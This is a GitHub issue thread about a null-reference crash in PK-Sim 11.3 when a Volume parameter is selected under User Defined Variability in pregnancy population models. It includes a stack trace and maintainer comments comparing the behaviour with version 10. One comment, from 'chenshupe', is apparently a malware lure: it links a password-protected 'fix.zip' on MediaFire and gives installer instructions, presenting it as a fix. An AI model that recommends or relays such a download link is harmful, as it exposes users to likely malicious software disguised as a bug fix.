### ISSUE TITLE
Error when selecting user defined variability in pregnancy models

### ISSUE THREAD

**Issue by PavelBal** [Open-Systems-Pharmacology/PK-Sim#2964]
Open a PK-Sim project from the pregnancy-repository (e.g., "Acyclovir.pksim5").

Open a pregnant population, navigate to "User Defined Variability". Select any "Volume":

![image](https://github.com/user-attachments/assets/ed1a9115-d547-45d2-8869-f38970628cac)

Application:
PK-Sim® 11.3.208

Object reference not set to an instance of an object.

Stack trace:
```
at PKSim.Presentation.Presenters.AdvancedParameters.AdvancedParametersPresenter.advancedParameterSelected(ParameterNodeSelectedEventArgs e)
   at PKSim.Presentation.Presenters.AdvancedParameters.AdvancedParametersPresenter.<.ctor>b__8_3(Object o, ParameterNodeSelectedEventArgs e)
   at System.EventHandler`1.Invoke(Object sender, TEventArgs e)
   at PKSim.Presentation.Presenters.Populations.PopulationParameterGroupsPresenter.NodeSelected(ITreeNode node)
   at PKSim.UI.Views.Populations.PopulationParameterGroupsView.<>c__DisplayClass9_0.<activateNode>b__0()
   at OSPSuite.UI.Controls.BaseUserControl.<>c__DisplayClass23_0.<OnEvent>b__0()
   at OSPSuite.Utility.Extensions.ExceptionExtensions.DoWithinExceptionHandler(Object callerObject, Action actionToExecute)
```

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rwmcintosh** [comment]
When I open that project in V10 there aren't any parameters selected to the right panel.

I think the fix for Volume parameters is different from the others under Physiology, though.

Example, 
"Fetal Hematocrit" is selectable in the left panel in V10, so it should appear there, but for this project, it should not appear in the right panel. It's selectable, but not selected.

"Volume" is not selectable in the left panel in V10 and should not be present in either panel.

**Comment by rwmcintosh** [comment]
On further comparison with V10, none of those parameters should be selectable in the right panel.
